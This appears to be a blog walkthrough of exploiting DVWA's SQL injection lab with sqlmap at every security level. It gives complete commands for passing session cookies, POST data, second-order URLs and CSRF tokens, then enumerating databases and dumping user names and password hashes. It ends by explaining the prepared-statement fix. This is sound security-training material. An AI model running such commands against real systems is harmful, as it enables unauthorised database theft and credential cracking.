DVWA: SQL injection with sqlmap

Table of contents

1. Sqlmap
   1. Introduction
   2. Basic steps
   3. Commands
2. SQL Injection
   1. Low
   2. Medium
   3. High
   4. Impossible


1. Sqlmap

1. Introduction

        Sqlmap is an open-source automated SQL injection tool. It detects and exploits SQL injection flaws in a given URL and then fingerprints and enumerates the back-end database. Supported DBMSs include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

It exploits injection points with the following techniques (selectable with --technique; sqlmap also supports out-of-band exfiltration, which is not needed for DVWA):

  • Boolean-based blind: the injected condition is judged true or false from differences in the returned page.
  • Time-based blind: the page content reveals nothing, so a conditional time-delay statement (for example SLEEP()) is injected and the response time shows whether the condition held.
  • Error-based: the database error message is echoed back in the page and carries the result of the injected expression.
  • UNION query-based: a UNION SELECT is appended so that the rows of the injected query are rendered in the page together with, or instead of, the original results; this requires the original query's results to be displayed.
  • Stacked queries: several statements separated by semicolons are executed in one request, where the driver and DBMS permit it.
     

2. Basic steps

    1. List sqlmap's options: sqlmap -h
    2. Point sqlmap at a target URL; it tests the parameters for injection and fingerprints the DBMS: sqlmap -u "target URL"
    3. Once the DBMS (here MySQL) is confirmed, list the databases: sqlmap -u "target URL" --dbs
    4. List the tables in a database: sqlmap -u "target URL" --tables -D database_name
    5. List the columns of a table: sqlmap -u "target URL" --columns -T table_name -D database_name
    6. Dump the contents of the chosen columns: sqlmap -u "target URL" --dump -C column_names -T table_name -D database_name

A few points to know before starting:

    sqlmap needs parameters, the most important being the target URL to test. First check whether the target requires a login; if it does, pass the session cookie from the logged-in browser to sqlmap:
        python sqlmap.py -u "target URL" --cookie="cookie value" --batch
    --batch runs non-interactively, taking the default answer to every prompt; without it each step asks for confirmation.
    --current-db prints the name of the current database.
    -D DB names the database to enumerate.
    -T TBL names the table to enumerate.
    -C COL names the column(s) to enumerate.
    -X EXCLUDECOL names column(s) to leave out.
    -U USER names the DBMS user to enumerate.

3. Commands

sqlmap.py -u "http://xxx//"  --batch

sqlmap.py -u "http://xxx//"  --cookie="captured cookie"

# list the databases
sqlmap.py -u "http://xxx//"  --cookie="captured cookie"  --dbs

# list the tables in the dvwa database
sqlmap.py -u "http://xxx//"  --cookie="captured cookie"  -D dvwa --tables

# list the column names of a table
sqlmap.py -u "http://xxx//"  --cookie="captured cookie"  -D dvwa -T users --columns

# dump the contents of the chosen columns
sqlmap.py -u "http://xxx//"  --cookie="captured cookie"  -D dvwa -T users -C user,password --dump

2. SQL Injection

1. Low

Enter id=1 in the form and copy the resulting URL; the low level submits with GET, so the id is in the query string.

Run sqlmap against it to detect the injection:

sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --batch

sqlmap is sent to the login page, so the session is required: copy the PHPSESSID and security cookies from the logged-in browser (or from Burp) and pass them with --cookie.

List the databases:

sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch --dbs

List the tables of the dvwa database:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa --tables

List the column names of the users table:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users --columns

Dump the user and password columns:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users -C user,password --dump

The user names and password hashes are now dumped; sqlmap also offers to crack the hashes with a dictionary attack when it recognises the hash format.

2. Medium

On the medium level the id is chosen from a drop-down and sent with POST, so the URL does not change when we submit id=1.

Capture the request with Burp Suite to see the POST body.

Because the parameter travels in the POST body rather than the query string, pass it to sqlmap with --data. This level escapes quotes in the input, but the id is used unquoted in the query, so numeric injection still works and sqlmap finds it without help.

Detect the injection:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch

List the databases:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch --dbs

List the tables of the dvwa database:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa --tables

List the column names:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users --columns

Dump the user and password columns:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users -C user,password --dump

3. High

On the high level the id is entered on a separate pop-up page (session-input.php), stored in the session, and only used, with the result rendered, on the main sqli page. This is the second-order case: the page that receives the injected input is not the page whose response shows whether the injection worked, so sqlmap has to be told which URL to fetch and examine after each request. The option for this is --second-url (older sqlmap releases called it --second-order), followed by the URL of the page to judge.

Capture the request with Burp Suite, because the POST body sent to session-input.php is not visible in the browser's address bar.

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch

The remaining enumeration is the same as for the low and medium levels.

Dump the data:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password --dump

4. Impossible

This level adds an anti-CSRF token (user_token) to every request; we obtain it by capturing the request in Burp Suite.

Run sqlmap with the captured token and session cookie:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=f237dc0df1d6cdf589f09179a99fa7aa#" --cookie="security=impossible;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --batch

Then attempt the same dump as on the earlier levels:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=581a16aa4511d8c46a3ea1834973122a#" --cookie="security=impossible;PHPSESSID=0mcqc7ludqslr2se50lsaas3g0" --batch -D dvwa -T users -C user,password --dump

Two caveats apply here. First, the token is bound to the session and regenerated on every request, which is why the two commands above carry different user_token and PHPSESSID values: a value copied out of Burp is accepted once and rejected afterwards. Rather than pasting it into the URL, let sqlmap fetch a fresh one before each request with --csrf-token=user_token (adding --csrf-url if the token has to be read from a page other than the target). Second, the impossible level checks that id is numeric and runs the query as a prepared statement with a bound parameter, so the result to expect is sqlmap reporting that the id parameter does not appear to be injectable. That is the point of this level: it is the fix the earlier levels lack.
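As an added illustration of the first caveat, not part of the original post and with illustrative names rather than DVWA's own code, the following Python models the per-request token rotation. It shows why a token captured once in Burp fails on the second request, and what sqlmap's --csrf-token handling amounts to: read a fresh token from the form before every request.

```python
import secrets

# Constructed stand-in for DVWA's per-request anti-CSRF token on the impossible
# level. Assumption: class and function names are illustrative, not DVWA's code.


class DvwaSession:
    """Server side: one token per session, replaced after every check."""

    def __init__(self):
        self.token = secrets.token_hex(16)

    def check_token(self, supplied):
        ok = secrets.compare_digest(supplied or "", self.token)
        self.token = secrets.token_hex(16)  # rotated whether or not the check passed
        return ok


def sqli_page(session, params):
    """Server side: the sqli page reduced to its token handling. A request without
    Submit renders the form (and so reveals the current token); a request with
    Submit must carry that token, and consumes it."""
    if "Submit" not in params:
        return "form", session.token
    if not session.check_token(params.get("user_token")):
        return "CSRF token is incorrect", None
    return "ok", None


def replay_captured_token(session):
    """What pasting a Burp-captured token into the URL does: the same value is
    replayed on every request. Returns the status of two consecutive requests."""
    _, token = sqli_page(session, {})
    first, _ = sqli_page(session, {"id": "1", "Submit": "Submit", "user_token": token})
    second, _ = sqli_page(session, {"id": "2", "Submit": "Submit", "user_token": token})
    return first, second


def refresh_token_each_request(session, ids):
    """What sqlmap does with --csrf-token=user_token: fetch the form, read the
    fresh token, then send the request with it, for every single request."""
    outcomes = []
    for value in ids:
        _, token = sqli_page(session, {})
        status, _ = sqli_page(session, {"id": value, "Submit": "Submit", "user_token": token})
        outcomes.append(status)
    return outcomes


if __name__ == "__main__":
    print(replay_captured_token(DvwaSession()))
    print(refresh_token_each_request(DvwaSession(), ["1", "2", "1' OR '1'='1"]))
```

The replay yields ('ok', 'CSRF token is incorrect'): every request after the first is refused before the id is even looked at, which is what a fixed user_token in the sqlmap command line runs into. Refreshing the token keeps every request accepted, after which the parameterised query, not the token, is what stops the injection.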


Origin blog.csdn.net/m0_65712192/article/details/128005589